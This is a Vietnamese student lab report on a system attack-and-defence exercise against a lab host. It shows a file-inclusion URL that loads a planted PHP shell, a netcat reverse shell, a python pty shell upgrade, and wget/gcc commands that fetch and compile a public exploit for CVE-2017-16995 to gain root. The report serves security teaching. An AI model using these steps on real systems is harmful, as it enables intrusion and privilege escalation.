Professional Documents
Culture Documents
Nguyễn Văn Dũng-AT170213 - Lab03
Nguyễn Văn Dũng-AT170213 - Lab03
HỌC PHẦN
TẤN CÔNG VÀ PHÒNG THỦ HỆ THỐNG
Hà Nội, 2023
MỤC LỤC
MỤC LỤC.................................................................................................................2
MÔ HÌNH THỰC NGHIỆM.....................................................................................3
THỰC NGHIỆM.......................................................................................................4
MÔ HÌNH THỰC NGHIỆM
THỰC NGHIỆM
Trên Parrot, kiểm tra địa chỉ ip
Thực thi Shell và dùng Netcat để lắng nghe kết nối đến
http://192.168.91.138/antibot_image/antibots/info.php?image=/tmp/shell_hack.php
+ Session đã mở chèn reverse code thành công
Kiểm tra phiên bản Kernel bằng các dùng lệnh
Phiên bản Kernel tồn tại lỗ hổng cho phép leo thang đặc quyền.
Up shell sử dụng python
python3 -c 'import pty; pty.spawn("/bin/bash")'
Thực hiện leo thang lên quyền root sử dụng CVE: 2017-16995
https://www.exploit-db.com/exploits/45010
+ Tải file khai thác CVE
cd /tmp
wget https://www.exploit-db.com/raw/45010 -O exploit.c
+ Compile file .c gcc-5 exploit.c -o exploit –pthread